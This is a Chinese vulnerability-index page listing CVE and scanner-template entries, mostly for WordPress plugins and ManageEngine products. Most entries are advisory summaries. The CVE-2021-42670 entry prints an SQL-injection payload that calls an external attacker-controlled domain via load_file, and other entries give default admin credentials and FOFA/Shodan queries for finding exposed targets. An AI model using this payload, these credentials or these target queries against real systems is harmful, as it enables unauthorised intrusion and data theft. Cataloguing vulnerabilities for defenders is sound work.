Gin 漏洞列表
共找到 200 个与 Gin 相关的漏洞
📅 加载漏洞趋势中...
-
Wordpress Plugin Ultimate Auction Pro /wp-admin/admin-ajax.php uwa_see_more_bids_ajax SQL 注入漏洞 (CVE-2025-4204) 无POC
WordPress的Ultimate Auction Pro插件在1.5.2及之前所有版本中存在参数为‘auction_id'的SQL注入漏洞,该漏洞源于对用户提供参数转义不充分以及现有SQL查询缺乏充分预处理。这使得未经身份验证的攻击者能够向现有查询附加额外SQL语句,从而从数据库提取敏感信息。 -
nginxWebUI cmdOver 远程命令执行漏洞 无POC
nginxWebUI cmdOver 接口存在远程命令执行漏洞,攻击者通过漏洞可以获取到服务器权限,执行任意命令 -
WordPress plugin Events Addon for Elementor 跨站脚本漏洞 无POC
WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Events Addon for Elementor 2.2.9及之前版本存在跨站脚本漏洞,该漏洞源于输入清理和转义不足,可能导致存储型跨站脚本攻击。 -
WordPress plugin Related Posts Lite 跨站请求伪造漏洞 无POC
WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Related Posts Lite 1.12及之前版本存在跨站请求伪造漏洞,该漏洞源于缺少或错误的随机数验证,可能导致跨站请求伪造攻击。 -
WordPress plugin TablePress 跨站脚本漏洞 无POC
WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin TablePress 3.2及之前版本存在跨站脚本漏洞,该漏洞源于参数shortcode_debug存在存储型跨站脚本漏洞,可能导致注入任意Web脚本。 -
WordPress plugin Ocean Extra 跨站脚本漏洞 无POC
WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Ocean Extra 2.4.9及之前版本存在跨站脚本漏洞,该漏洞源于输入清理和输出转义不足,可能导致存储型跨站脚本攻击。 -
CVE-2021-42670: Engineers Online Portal 1.0 容易受到三种类型的SQL注入攻击 POC
Engineers Online Portal 1.0 应用程序中的 id 参数my_classmates.php似乎容易受到三种类型的 SQL 注入攻击,即基于布尔的盲注、基于错误的查询和 UNION 查询。payload '+(select load_file('\hh2s4z961nps5mtx8px8zoud248ywq0erhf82yqn.nu11secur1tyexploit.net\ggc'))+' 在 id 参数中提交。此有效负载注入一个 SQL 子查询,该查询使用引用外部域上的 URL 的 UNC 文件路径调用 MySQL 的 load_file 函数。应用程序与该域交互,表明已执行注入的 SQL 查询。此外,用户登录容易受到参数“username”上的 SQL 注入绕过身份验证的攻击。 -
CVE-2022-36883: Git Plugin up to 4.11.3 on Jenkins Build Authorization POC
A missing permission check in Jenkins Git Plugin 4.11.3 and earlier allows unauthenticated attackers to trigger builds of jobs configured to use an attacker-specified Git repository and to cause them to check out an attacker-specified commit. -
CVE-2024-7954: SPIP Porte Plume Plugin rce POC
fofa: app="SPIP" 在4.30-alpha2、4.2.13和4.1.16之前的SPIP中使用的porte_plume插件存在任意代码执行漏洞。远程且未经认证的攻击者可以通过发送特制的HTTP请求,以SPIP用户的身份执行任意PHP代码。 -
dolphinscheduler-default-login: Apache DolphinScheduler Default Login POC
Apache DolphinScheduler default admin credentials were discovered. SHODAN: http.title:"DolphinScheduler" FOFA: title="DolphinScheduler" -
dvwa-default-login: DVWA Default Login POC
Damn Vulnerable Web App (DVWA) is a test application for security professionals. The hard coded credentials are part of a security testing scenario. FOFA: app="Damn-Vulnerable-Web-App-(DVWA)-Login" -
exacqvision-default-login: ExacqVision Default Login POC
ExacqVision Web Service default login credentials (admin/admin256) were discovered. FOFA: ExacqVision -
guacamole-default-login: Guacamole Default Login POC
Guacamole default admin login credentials were detected. -
inspur-clusterengine-default-login: Inspur Clusterengine 4 - Default Admin Login POC
Inspur Clusterengine version 4 default admin login credentials were successful. FOFA: title="TSCEV4.0" -
stackstorm-default-login: StackStorm Default Login POC
A StackStorm default admin login was discovered. FOFA: app="stackstorm" -
wso2-default-login: WSO2 Management Console Default Login POC
WSO2 Management Console default admin credentials were discovered. -
acemanager-login: ACEmanager Detection POC
ACEManager was detected. ACEManager is a configuration and diagnostic tool for the Sierra Wireless AirLink Raven modems. FOFA: app="ACEmanager" -
adminer-panel: Adminer Login Panel POC
An Adminer login panel was detected. app="Adminer" -
cas-login: CAS Login Panel POC
shodan-query: http.title:'CAS - Central Authentication Service' -
geoserver-login-panel: GeoServer Login Panel - Detect POC
GeoServer login panel was detected. shodan-query: title:"GeoServer" -
hue-login-panel: Cloudera Hue Login Panel POC
Cloudera Hue default admin credentials were discovered. Fofa: title="Hue - 欢迎使用 Hue" default admin login: admin/admin hue/hue hadoop/hadoop cloudera/cloudera -
manageengine-analytics: ZOHO ManageEngine Analytics Plus Panel - Detect POC
ZOHO ManageEngine analytics plus panel was detected. FOFA: app="ZOHO-流量管理" -
novnc-login-panel: noVNC Login Panel - Detect POC
noVNC login panel was detected. Fofa: title="noVNC" -
openstack-dashboard-login: OpenStack Dashboard Login Panel - Detect POC
OpenStack Dashboard login panel was detected. -
cobbler-default-login: Cobbler Default Login POC
Cobbler default login credentials for the testing module (testing/testing) were discovered. fofa "Cobbler" -
csl-login-unauth-db-leak: CSL Login unauthorized DB Leak POC
FOFA: "csl/login" -
evolucare-ecsimaging-download-stats-dicom-anyfile-read: Evolucare Ecsimaging download_stats_dicom.php 任意文件读取漏洞 POC
Evolucare Ecsimaging download_stats_dicom.php 存在文件读取漏洞,攻击者可利用该漏洞获取系统敏感信息等.漏洞影响:EVOLUCARE Evolucare Ecsimaging 6.21.5 body="ECSimaging" -
evolucare-ecsimaging-new-movie-rce: Evolucare Ecsimaging new_movie.php 远程命令执行漏洞 POC
EVOLUCARE ECSimage是一款国外使用的医疗管理系统,研究发现其new_movie.php接口中存在命令注入漏洞,攻击者可利用该漏洞获取系统敏感信息等.漏洞影响:EVOLUCARE Evolucare Ecsimaging 6.21.5 fofa-query: body="ECSimaging" -
hikvision-applyautologinticket-rce: 海康威视综合安防管理平台 applyAutoLoginTicket RCE POC
海康综合安防管理平台 applyAutoLoginTicket 接口存在 fastjson 反序列化漏洞。攻击者可在未鉴权的情况下,对目标服务器进行远程命令执行,从而获取服务器权限。 Fofa: app="HIKVISION-综合安防管理平台" Fofa: icon_hash="136203464" Hunter: web.icon="753466eed2bbef2bae18b55994d1d2ae" -
landray-wechat-loginhelper-sqli: 蓝凌OA wechatLoginHelper存在SQL注入 POC
Fofa: app="Landray-OA系统" -
metersphere-plugincontroller-rce: MeterSphere PluginController Pre-auth RCE POC
FaFo: body="Metersphere" -
nginx-merge-slashes-path-traversal: Nginx Merge Slashes Path Traversal POC
A vulnerability in the remote Nginx server could cause the server to merge slashslash together causing what should have protected the web site from a directory traversal vulnerability into a vulnerable server. -
nginxwebui-admin-bypass: NginxWebUI admin认证绕过(全版本通杀) POC
Admin类型注入autoKey绕过认证、绕过密码和Google认证获取管理员权限 FOFA: app="nginxWebUI" -
nginxwebui-rce: Nginx Web UI RCE POC
FOFA: app="nginxWebUI" -
phpstudy-nginx-wrong-resolve: Phpstudy Nginx Wrong Resolve POC
Phpstudy Nginx Wrong Resolve -
wanhu-oa-rhinoscript-engineservice-rce: 万户OA-RhinoScriptEngineService命令执行 POC
Fofa: app="万户网络-ezOFFICE" -
yonyou-yonbip-yonbiplogin-fileread: 用友YonBIP_yonbiplogin存在任意文件读取漏洞 POC
YonBIP用友商业创新平台,是用友在数字经济时代面向成长型、大型企业及巨型企业,融合了先进且高可用技术平台和公共与关键商业应用与服务,支撑和运行客户的商业创新(业务创新、管理变革),并且具有数字化、智能化、高弹性、安全可信、社会化、全球化、平台化、生态化等特征的综合型服务平台。用友YonBIP yonbiplogin存在任意文件读取漏洞,攻击者可通过该漏洞获取敏感信息。 fofa: title="YonBIP" || title="数字化工作台" -
WordPress plugin WP ULike Pro 代码问题漏洞 无POC
WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin WP ULike Pro 1.9.3及之前版本存在代码问题漏洞,该漏洞源于文件类型验证不足,可能导致任意文件上传。 -
Docker Desktop Engine API 未授权访问漏洞 无POC
未授权访问漏洞是指攻击者未经过身份验证或绕过身份验证机制,就能够访问系统资源或执行敏感操作的安全漏洞。这种漏洞可能导致敏感信息泄露、数据篡改、服务中断等严重后果,给系统安全性带来极大威胁。 -
WordPress Plugin email-subscribers /wp-admin/admin-post.php advanced_filter SQL 注入漏洞(CVE-2024-2876) 无POC
WordPress Plugin email-subscribers 是一个用于管理电子邮件订阅的插件。该漏洞是由于插件在处理用户输入时未能正确过滤和验证,导致攻击者可以通过构造恶意的SQL语句,执行SQL注入攻击。成功利用此漏洞可能导致数据库信息泄露、数据篡改或进一步的系统入侵。 -
CVE-2025-1974-k8s: Ingress-Nginx Controller - Unauthenticated Remote Code Execution POC
A security issue was discovered in ingress-nginx where the `auth-tls-match-cn` Ingress annotation can be used to inject configuration into nginx. This can lead to arbitrary code execution in the context of the ingress-nginx controller, and disclosure of Secrets accessible to the controller -
CVE-2008-7269: UC Gateway Investment SiteEngine v5.0 - Open Redirect POC
Open redirect vulnerability in api.php in SiteEngine 5.x allows user-assisted remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the forward parameter in a logout action. -
CVE-2011-5106: WordPress Plugin Flexible Custom Post Type < 0.1.7 - Cross-Site Scripting POC
A cross-site scripting vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter. -
CVE-2012-1835: WordPress Plugin All-in-One Event Calendar 1.4 - Cross-Site Scripting POC
Multiple cross-site scripting vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php. -
CVE-2012-4242: WordPress Plugin MF Gig Calendar 0.9.2 - Cross-Site Scripting POC
A cross-site scripting vulnerability in the MF Gig Calendar plugin 0.9.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the query string to the calendar page. -
CVE-2012-4768: WordPress Plugin Download Monitor < 3.3.5.9 - Cross-Site Scripting POC
A cross-site scripting vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI. -
CVE-2012-4889: ManageEngine Firewall Analyzer 7.2 - Cross-Site Scripting POC
Multiple cross-site scripting vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do. -
CVE-2012-6499: WordPress Plugin Age Verification v0.4 - Open Redirect POC
Open redirect vulnerability in age-verification.php in the Age Verification plugin 0.4 and earlier for WordPress allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect_to parameter. -
CVE-2013-2287: WordPress Plugin Uploader 1.0.4 - Cross-Site Scripting POC
Multiple cross-site scripting vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter. -
CVE-2013-3526: WordPress Plugin Traffic Analyzer - 'aoid' Cross-Site Scripting POC
A cross-site scripting vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter." -
CVE-2013-4117: WordPress Plugin Category Grid View Gallery 2.3.1 - Cross-Site Scripting POC
A cross-site scripting vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter. -
CVE-2013-4625: WordPress Plugin Duplicator < 0.4.5 - Cross-Site Scripting POC
A cross-site scripting vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter. -
CVE-2014-4561: Ultimate Weather Plugin <= 1.0 - Cross-Site Scripting POC
The ultimate-weather plugin 1.0 for WordPress contains a cross-site scripting vulnerability. -
CVE-2014-4940: WordPress Plugin Tera Charts - Local File Inclusion POC
Multiple local file inclusion vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php. -
CVE-2014-5368: WordPress Plugin WP Content Source Control - Directory Traversal POC
A directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter. -
CVE-2014-8799: WordPress Plugin DukaPress 2.5.2 - Directory Traversal POC
A directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php. -
CVE-2014-9094: WordPress DZS-VideoGallery Plugin Cross-Site Scripting POC
Multiple cross-site scripting vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter. -
CVE-2015-4455: WordPress Plugin Aviary Image Editor Addon For Gravity Forms 3.0 Beta - Arbitrary File Upload POC
Unrestricted file upload vulnerability in includes/upload.php in the Aviary Image Editor Add-on For Gravity Forms plugin 3.0 beta for WordPress allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in wp-content/uploads/gform_aviary. -
CVE-2015-7780: ManageEngine Firewall Analyzer <8.0 - Local File Inclusion POC
ManageEngine Firewall Analyzer before 8.0 is vulnerable to local file inclusion. -
CVE-2016-10973: Brafton WordPress Plugin < 3.4.8 - Cross-Site Scripting POC
The Brafton plugin before 3.4.8 for WordPress has XSS via the wp-admin/admin.php?page=BraftonArticleLoader tab parameter to BraftonAdminPage.php. -
CVE-2016-10976: Safe Editor Plugin < 1.2 - CSS/JS-injection POC
The safe-editor plugin before 1.2 for WordPress has no se_save authentication, with resultant XSS. -
CVE-2016-7834: Sony IPELA Engine IP Camera - Hardcoded Account POC
Multiple SONY network cameras are vulnerable to sensitive information disclosure via hardcoded credentials. -
CVE-2017-11512: ManageEngine ServiceDesk 9.3.9328 - Arbitrary File Retrieval POC
ManageEngine ServiceDesk 9.3.9328 is vulnerable to an arbitrary file retrieval due to improper restrictions of the pathname used in the name parameter for the download-snapshot path. An unauthenticated remote attacker can use this vulnerability to download arbitrary files. -
CVE-2017-18501: Social Login by BestWebSoft < 0.2 - Cross-Site Scripting POC
The social-login-bws plugin before 0.2 for WordPress has multiple XSS issues. -
CVE-2017-18590: Timesheet Plugin < 0.1.5 - Cross-Site Scripting POC
The Timesheet plugin before 0.1.5 for WordPress has multiple XSS issues. -
CVE-2018-1000600: Jenkins GitHub Plugin <=1.29.1 - Server-Side Request Forgery POC
Jenkins GitHub Plugin 1.29.1 and earlier is susceptible to server-side request forgery via GitHubTokenCredentialsCreator.java, which allows attackers to leverage attacker-specified credentials IDs obtained through another method and capture the credentials stored in Jenkins. -
CVE-2018-12998: Zoho manageengine - Cross-Site Scripting POC
Zoho manageengine is vulnerable to reflected cross-site scripting. This impacts Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet. -
CVE-2018-16283: WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion POC
WordPress Wechat Broadcast plugin 1.2.0 and earlier allows Directory Traversal via the Image.php url parameter. -
CVE-2018-17283: Zoho ManageEngine OpManager - SQL Injection POC
Zoho ManageEngine OpManager before 12.3 Build 123196 does not require authentication for /oputilsServlet requests, as demonstrated by a /oputilsServlet?action=getAPIKey request that can be leveraged against Firewall Analyzer to add an admin user via /api/json/v2/admin/addUser or conduct a SQL Injection attack via the /api/json/device/setManaged name parameter. -
CVE-2018-19365: Wowza Streaming Engine Manager 4.7.4.01 - Directory Traversal POC
Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request to the REST API. -
CVE-2019-1003000: Jenkins Script Security Plugin <=1.49 - Sandbox Bypass POC
A sandbox bypass vulnerability exists in the Jenkins Script Security Plugin (versions 1.49 and earlier) within src/main/java/org/jenkinsci/plugins/scriptsecurity/sandbox/groovy/GroovySandbox.java. This flaw allows attackers with permission to submit sandboxed scripts to execute arbitrary code on the Jenkins master JVM, potentially compromising the entire Jenkins environment. -
CVE-2019-10717: BlogEngine.NET 3.3.7.0 - Local File Inclusion POC
BlogEngine.NET 3.3.7.0 allows /api/filemanager local file inclusion via the path parameter -
CVE-2020-10189: ManageEngine Desktop Central Java Deserialization POC
Zoho ManageEngine Desktop Central before 10.0.474 is vulnerable to a deserialization of untrusted data, which permits remote code execution. -
CVE-2020-12116: Zoho ManageEngine OpManger - Arbitrary File Read POC
Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a specially crafted request. -
CVE-2020-21224: Inspur ClusterEngine 4.0 - Remote Code Execution POC
Inspur ClusterEngine V4.0 is suscptible to a remote code execution vulnerability. A remote attacker can send a malicious login packet to the control server. -
CVE-2020-24148: Import XML & RSS Feeds WordPress Plugin <= 2.0.1 Server-Side Request Forgery POC
WordPress plugin Import XML and RSS Feeds (import-xml-feed) plugin 2.0.1 contains a server-side request forgery (SSRF) vulnerability via the data parameter in a moove_read_xml action. -
CVE-2020-24312: WordPress Plugin File Manager (wp-file-manager) Backup Disclosure POC
mndpsingh287 WP File Manager v6.4 and lower fails to restrict external access to the fm_backups directory with a .htaccess file. This results in the ability for unauthenticated users to browse and download any site backups, which sometimes include full database backups, that the plugin has taken. -
CVE-2020-25213: WordPress File Manager Plugin - Remote Code Execution POC
The WordPress File Manager plugin prior to version 6.9 is susceptible to remote code execution. The vulnerability allows unauthenticated remote attackers to upload .php files. -
CVE-2020-26876: WordPress WP Courses Plugin Information Disclosure POC
WordPress WP Courses Plugin < 2.0.29 contains a critical information disclosure which exposes private course videos and materials. -
CVE-2020-27481: Good Layers LMS Plugin <= 2.1.4 - SQL Injection POC
An unauthenticated SQL Injection vulnerability in Good Layers LMS Plugin <= 2.1.4 exists due to the usage of "wp_ajax_nopriv" call in WordPress, which allows any unauthenticated user to get access to the function "gdlr_lms_cancel_booking" where POST Parameter "id" was sent straight into SQL query without sanitization. -
CVE-2020-35234: SMTP WP Plugin Directory Listing POC
The WordPress Easy WP SMTP Plugin has its log folder remotely accessible and its content available for access. -
CVE-2020-36728: WordPress Plugin Adning Advertising < 1.5.6 - Arbitrary File Upload POC
The Adning Advertising plugin for WordPress versions below 1.5.6 is vulnerable to arbitrary file upload, allowing attackers to upload malicious files to the server. -
CVE-2021-24215: Controlled Admin Access WordPress Plugin <= 1.4.0 - Improper Access Control & Privilege Escalation POC
An Improper Access Control vulnerability was discovered in the plugin. Uncontrolled access to the website customization functionality and global CMS settings, like /wp-admin/customization.php and /wp-admin/options.php, can lead to a complete compromise of the target resource. -
CVE-2021-24286: WordPress Plugin Redirect 404 to Parent 1.3.0 - Cross-Site Scripting POC
The settings page of the plugin did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue. -
CVE-2021-24746: WordPress Sassy Social Share Plugin <3.3.40 - Cross-Site Scripting POC
WordPress plugin Sassy Social Share < 3.3.40 contains a reflected cross-site scripting vulnerability. -
CVE-2021-24917: WordPress WPS Hide Login <1.9.1 - Information Disclosure POC
WordPress WPS Hide Login plugin before 1.9.1 is susceptible to incorrect authorization. An attacker can obtain the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user. This reveals the secret login location. -
CVE-2021-24991: WooCommerce PDF Invoices & Packing Slips WordPress Plugin < 2.10.5 - Cross-Site Scripting POC
The Wordpress plugin WooCommerce PDF Invoices & Packing Slips before 2.10.5 does not escape the tab and section parameters before reflecting it an attribute, leading to a reflected cross-site scripting in the admin dashboard. -
CVE-2021-25008: The Code Snippets WordPress Plugin < 2.14.3 - Cross-Site Scripting POC
The Wordpress plugin Code Snippets before 2.14.3 does not escape the snippets-safe-mode parameter before reflecting it in attributes, leading to a reflected cross-site scripting issue. -
CVE-2021-25085: WOOF WordPress plugin - Cross-Site Scripting POC
The WOOF WordPress plugin does not sanitize or escape the woof_redraw_elements parameter before reflecting it back in an admin page, leading to a reflected cross-site scripting. -
CVE-2021-33851: WordPress Customize Login Image <3.5.3 - Cross-Site Scripting POC
WordPress Customize Login Image plugin prior to 3.5.3 contains a cross-site scripting vulnerability via the custom logo link on the Settings page. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks. -
CVE-2021-37416: Zoho ManageEngine ADSelfService Plus <=6103 - Cross-Site Scripting POC
Zoho ManageEngine ADSelfService Plus 6103 and prior contains a reflected cross-site scripting vulnerability on the loadframe page. -
CVE-2021-39322: WordPress Easy Social Icons Plugin < 3.0.9 - Cross-Site Scripting POC
The Easy Social Icons plugin <= 3.0.8 for WordPress echoes out the raw value of `$_SERVER['PHP_SELF']` in its main file. On certain configurations including Apache+modPHP this makes it possible to use it to perform a reflected cross-site scripting attack by injecting malicious code in the request path. -
CVE-2021-39341: OptinMonster Plugin < 2.6.5 - Unprotected REST-API POC
The OptinMonster WordPress plugin is vulnerable to sensitive information disclosure and unauthorized setting updates due to insufficient authorization validation via the logged_in_or_has_api_key function in the ~/OMAPI/RestApi.php file that can used to exploit inject malicious web scripts on sites with the plugin installed. This affects versions up to, and including, 2.6.4. -
CVE-2021-39350: FV Flowplayer Video Player WordPress plugin - Authenticated Cross-Site Scripting POC
The FV Flowplayer Video Player WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the player_id parameter found in the ~/view/stats.php file which allows attackers to inject arbitrary web scripts in versions 7.5.0.727 - 7.5.2.727. -
CVE-2021-40539: Zoho ManageEngine ADSelfService Plus v6113 - Unauthenticated Remote Command Execution POC
Zoho ManageEngine ADSelfService Plus version 6113 and prior are vulnerable to a REST API authentication bypass vulnerability that can lead to remote code execution. -
CVE-2021-43778: GLPI plugin Barcode < 2.6.1 - Path Traversal Vulnerability. POC
Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability. -
CVE-2021-44077: Zoho ManageEngine ServiceDesk Plus - Remote Code Execution POC
Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014 are vulnerable to unauthenticated remote code execution. -
CVE-2021-44515: Zoho ManageEngine Desktop Central - Remote Code Execution POC
Zoho ManageEngine Desktop Central contains an authentication bypass vulnerability that could allow an attacker to execute arbitrary code in the Desktop Central MSP server. -
CVE-2022-0149: WooCommerce Stored Exporter WordPress Plugin < 2.7.1 - Cross-Site Scripting POC
The plugin was affected by a reflected cross-site scripting vulnerability in the woo_ce admin page. -
CVE-2022-0208: WordPress Plugin MapPress <2.73.4 - Cross-Site Scripting POC
WordPress Plugin MapPress before version 2.73.4 does not sanitize and escape the 'mapid' parameter before outputting it back in the "Bad mapid" error message, leading to reflected cross-site scripting. -
CVE-2022-0479: Popup Builder Plugin - SQL Injection and Cross-Site Scripting POC
The Popup Builder WordPress plugin before 4.1.1 is vulnerable to SQL Injection and Reflected XSS via the sgpb-subscription-popup-id parameter. -
CVE-2022-0651: WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection POC
The WP Statistics WordPress plugin is vulnerable to SQL Injection due to insufficient escaping and parameterization of the current_page_type parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers without authentication to inject arbitrary SQL queries to obtain sensitive information, in versions up to and including 13.1.5. -
CVE-2022-0653: Wordpress Profile Builder Plugin Cross-Site Scripting POC
The Profile Builder User Profile & User Registration Forms WordPress plugin is vulnerable to cross-site scripting due to insufficient escaping and sanitization of the site_url parameter found in the ~/assets/misc/fallback-page.php file which allows attackers to inject arbitrary web scripts onto a pages that executes whenever a user clicks on a specially crafted link by an attacker. This affects versions up to and including 3.6.1.. -
CVE-2022-0787: Limit Login Attempts (Spam Protection) < 5.1 - SQL Injection POC
The Limit Login Attempts (Spam Protection) WordPress plugin before 5.1 does not sanitise and escape some parameters before using them in SQL statements via AJAX actions (available to unauthenticated users), leading to SQL Injections. -
CVE-2022-1580: Site Offline WP Plugin < 1.5.3 - Authorization Bypass POC
The plugin prevents users from accessing a website but does not do so if the URL contained certain keywords. Adding those keywords to the URL's query string would bypass the plugin's main feature. -
CVE-2022-23779: Zoho ManageEngine - Internal Hostname Disclosure POC
Zoho ManageEngine Desktop Central before 10.1.2137.8 exposes the installed server name to anyone. The internal hostname can be discovered by reading HTTP redirect responses. -
CVE-2022-24681: ManageEngine ADSelfService Plus <6121 - Stored Cross-Site Scripting POC
ManageEngine ADSelfService Plus before 6121 contains a stored cross-site scripting vulnerability via the welcome name attribute to the Reset Password, Unlock Account, or User Must Change Password screens. -
CVE-2022-25148: WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection POC
The WP Statistics WordPress plugin is vulnerable to SQL Injection due to insufficient escaping and parameterization of the current_page_id parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers without authentication to inject arbitrary SQL queries to obtain sensitive information, in versions up to and including 13.1.5. -
CVE-2022-25149: WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection POC
The WP Statistics WordPress plugin is vulnerable to SQL Injection due to insufficient escaping and parameterization of the IP parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers without authentication to inject arbitrary SQL queries to obtain sensitive information, in versions up to and including 13.1.5. -
CVE-2022-28219: Zoho ManageEngine ADAudit Plus <7600 - XML Entity Injection/Remote Code Execution POC
Zoho ManageEngine ADAudit Plus before version 7060 is vulnerable to an unauthenticated XML entity injection attack that can lead to remote code execution. -
CVE-2022-3142: NEX-Forms Plugin < 7.9.7 - SQL Injection POC
The NEX-Forms WordPress plugin before 7.9.7 does not properly sanitise and escape user input before using it in SQL statements, leading to SQL injections. The attack can be executed by anyone who is permitted to view the forms statistics chart, by default administrators, however can be configured otherwise via the plugin settings. -
CVE-2022-35405: Zoho ManageEngine - Remote Code Execution POC
Zoho ManageEngine Password Manager Pro, PAM 360, and Access Manager Plus are susceptible to unauthenticated remote code execution via XML-RPC. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. -
CVE-2022-40032: Simple Task Managing System v1.0 - SQL Injection POC
SQL injection occurs when a web application doesn't properly validate or sanitize user input that is used in SQL queries. Attackers can exploit this by injecting malicious SQL code into the input fields of a web application, tricking the application into executing unintended database queries. -
CVE-2022-4305: Login as User or Customer < 3.3 - Privilege Escalation POC
The plugin lacks authorization checks to ensure that users are allowed to log in as another one, which could allow unauthenticated attackers to obtain a valid admin session. -
CVE-2022-45808: LearnPress Plugin < 4.2.0 - Unauthenticated Time-Based Blind SQLi POC
SQL Injection vulnerability in LearnPress – WordPress LMS Plugin <= 4.1.7.3.2 versions. -
CVE-2022-47615: LearnPress Plugin < 4.2.0 - Local File Inclusion POC
Local File Inclusion vulnerability in LearnPress – WordPress LMS Plugin <= 4.1.7.3.2 versions. -
CVE-2022-47966: ManageEngine - Remote Command Execution POC
Multiple Zoho ManageEngine on-premise products, such as ServiceDesk Plus through 14003, allow remote code execution due to use of Apache xmlsec (aka XML Security for Java) 1.4.1, because the xmlsec XSLT features, by design in that version, make the application responsible for certain security protections, and the ManageEngine applications did not provide those protections. -
CVE-2023-1119: WP-Optimize WordPress plugin < 3.2.13 - Cross-Site Scripting POC
The WP-Optimize WordPress plugin before 3.2.13 and SrbTransLatin WordPress plugin before 2.4.1 are vulnerable to cross-site scripting due to a third-party library that improperly handles HTML character escaping. -
CVE-2023-1893: Login Configurator <=2.1 - Cross-Site Scripting POC
Login Configurator WordPress plugin <= 2.1 contains a reflected cross-site scripting caused by improper escaping of URL parameter before outputting it to the page, letting attackers execute scripts in the context of site administrators, exploit requires victim to visit a malicious URL. -
CVE-2023-2518: WordPress Easy Forms for Mailchimp Plugin < 6.8.9 - Cross-Site Scripting POC
The Easy Forms for Mailchimp plugin before version 6.8.9 contains a reflected cross-site scripting vulnerability. The plugin does not properly sanitize and escape the sql_error parameter before outputting it back in the page when the debug option is enabled, which could allow attackers to execute arbitrary JavaScript code in an administrator's browser context. -
CVE-2023-2624: KiviCare WordPress Plugin - Cross-Site Scripting POC
The KiviCare WordPress plugin before 3.2.1 does not sanitise and escape the 'filterType' parameter, leading to Reflected Cross-Site Scripting. -
CVE-2023-29084: ManageEngine ADManager Plus - Command Injection POC
Zoho ManageEngine ADManager Plus through 7180 allows for authenticated users to exploit command injection via Proxy settings. -
CVE-2023-29439: FooGallery plugin <= 2.2.35 - Cross-Site Scripting POC
Reflected Cross-Site Scripting (XSS) vulnerability in FooPlugins FooGallery plugin <= 2.2.35 versions. -
